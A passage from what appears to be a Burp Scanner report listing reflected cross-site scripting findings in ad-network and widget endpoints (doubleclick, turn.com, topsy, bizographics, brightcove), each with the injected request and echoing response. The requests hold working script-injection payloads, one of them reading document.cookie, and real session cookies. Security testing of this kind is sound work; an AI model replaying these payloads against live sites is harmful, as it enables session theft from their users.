Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:23 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2c8"-alert(1)-"1f32606eed2 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:26 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37216

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1296257752903.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29875"-alert(1)-"c5c47c97bbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:44 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebe5e"-alert(1)-"7b2a3fedccd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:05 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
sf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

2.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7470"-alert(1)-"05fd012cf34 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:13 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac6/f/194/%2a/e%3B235864053%3B1-0%3B0%3B59652986%3B3454-728/90%3B39730864/39748651/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4
...[SNIP]...

2.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de360"><script>alert(1)</script>924b327da15 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=de360"><script>alert(1)</script>924b327da15 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Tue, 06-Sep-2011 22:19:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 10 Mar 2011 22:19:32 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=6966717148317790486&fpid=de360"><script>alert(1)</script>924b327da15&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f72d8<script>alert(1)</script>28031e810f8 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1cf72d8<script>alert(1)</script>28031e810f8&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.rodale.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=NZk5vbu0VxC8JipceOZmBRNQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv3TYgoKKSUPXtWXYC4ipisishWx61isSNkyistIItejAyV410ipNN9QFd9eD4PtZiidrsAhJaXIkrSiskUQGs0P7IwouzyiiCDECcwRmCZKPhsh12kQb9NipQisOs69PoecO0ujFerSeGafW9Mjb0uYNPFRdglDYuCjBqWZtThWhSii48NipADZiidrfMyxSuQgpBUmIZW5WzENkGacByoBjycateipx4n7q1sZv9ZvdCtsgTxis7W3iioxZSDipzHisOWeA5uCwcaIYpAt5pDsJsAtM5G1Mknjis1vlkTx9Mqhg0RN2nK5B29oiiex3ln3hiiYfpCN19YGFoLfZOJEe6dtyocipahCisRMEfrisHVpkJTXRisQgr8utIkbiiZtgG8YZLCXSY4OdXcii78AWA1xmxesM97m5CLipH6upZ3ii6GBVV9cmMDJUii4JiiYSisYtVEQGCLaCCXe5U1WipCeXjQ0vk7P79sgiiyscS0iidya7Dj6a6sACrHiilMkLAm3Pyx9JAwisip86B4jYMtEuVaa2xnO7FtuoxNNn62RDkcGtrtYyeC24uHAKNOKgj7hpTdfUw1nL2dz0DyOwplLDwM7yOZZz1TMZ9xwxZjgkKAiiVjp9Ty5ywcAieie; BizoNetworkPartnerIndex=23

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 10 Mar 2011 16:44:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1cf72d8<script>alert(1)</script>28031e810f8)

2.10. http://button.topsy.com/widget/retweet-json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6064a<script>alert(1)</script>69ba86fefe3 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id3-3-1-5-13-23-11-1&url=http%3A%2F%2Fusat.ly%2FgZGKv3&callback=topsyWidgetCallback6064a<script>alert(1)</script>69ba86fefe3 HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5
Content-Length: 540
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 10 Mar 2011 16:46:39 GMT
Last-Modified: Thu, 10 Mar 2011 16:46:34 GMT
Date: Thu, 10 Mar 2011 16:46:34 GMT
Server: lighttpd/1.4.26
X-Cache: MISS from 38.button.topsy.com
X-Cache-Lookup: MISS from 38.button.topsy.com:80
Connection: close

topsyWidgetCallback6064a<script>alert(1)</script>69ba86fefe3({ "html_id": "topsy_id3-3-1-5-13-23-11-1", "url": "http://yourlife.usatoday.com/sex-relationships/story/2011/03/Washington-DC-ranked-top-Twitter-Town-for-its-social-networking/44700538/1", "count": "2
...[SNIP]...

2.11. http://button.topsy.com/widget/retweet-json [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 2ddb4<script>alert(1)</script>1075e4b5c4c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id3-3-1-5-13-23-11-12ddb4<script>alert(1)</script>1075e4b5c4c&url=http%3A%2F%2Fusat.ly%2FgZGKv3&callback=topsyWidgetCallback HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5
Content-Length: 540
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 10 Mar 2011 16:46:37 GMT
Last-Modified: Thu, 10 Mar 2011 16:46:32 GMT
Date: Thu, 10 Mar 2011 16:46:32 GMT
Server: lighttpd/1.4.26
X-Cache: MISS from 21.button.topsy.com
X-Cache-Lookup: MISS from 21.button.topsy.com:80
Connection: close

topsyWidgetCallback({ "html_id": "topsy_id3-3-1-5-13-23-11-12ddb4<script>alert(1)</script>1075e4b5c4c", "url": "http://yourlife.usatoday.com/sex-relationships/story/2011/03/Washington-DC-ranked-top-Twitter-Town-for-its-social-networking/44700538/1", "count": "231", "badge": "1k", "trackback_url": "htt
...[SNIP]...

2.12. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload abac2<script>alert(1)</script>71864f41a7 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAABmSxQc~,497DR8qMzMu1cSa2IHyZJwozOiERaBVX HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=280&flashID=myExperience772399363001&bgcolor=%23FFFFFF&playerID=30292868001&playerKey=AQ~~%2CAAAAABmSxQc~%2C497DR8qMzMu1cSa2IHyZJwozOiERaBVX&isVid=true&dynamicStreaming=true&wmode=opaque&%40videoPlayer=772399363001&autoStart=&debuggerID=
content-type: application/x-amf
Accept: */*
